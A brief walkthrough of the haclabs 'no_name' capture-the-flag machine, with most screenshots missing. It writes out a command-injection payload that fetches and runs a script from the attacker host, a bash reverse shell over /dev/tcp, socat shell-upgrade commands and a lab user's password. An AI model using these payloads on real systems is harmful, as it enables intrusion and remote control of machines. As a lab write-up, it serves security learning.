haclabs: no_name Walkthrough
reference | haclabs: no_name |
target ip | 192.168.1.19 |
Scan with nmap
:

Enumerate port 80 with gobuster
:

A passphrase can be found:

There’s something hiding in the picture:

imp.txt
leads to a ping page, which may filter certain characters.
wget
to get a reverse shell.
1 | $(wget -qO- 192.168.1.89|bash) |
Host a rs.sh
on Kali port 80.
1 | server { |
1 | bash -i >& /dev/tcp/192.168.1.89/443 0>&1 |
Get a reverse shell:

flag1.txt
implies there’s a hidden file:

find
the hidden file:

password of user haclabs
:

But a fully interactive TTYs needs to be spawned in order to use su
.
Use socat
to spawn a fully interactive TTY.
Setup a server on Kali:
1 | socat file:`tty`,raw,echo=0 tcp-listen:4444 |
Setup a client on the target:
1 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.89:4444 |


Escalate to user haclabs
with the password haclabs1234
:

Escalate to user root
is very straightforward:
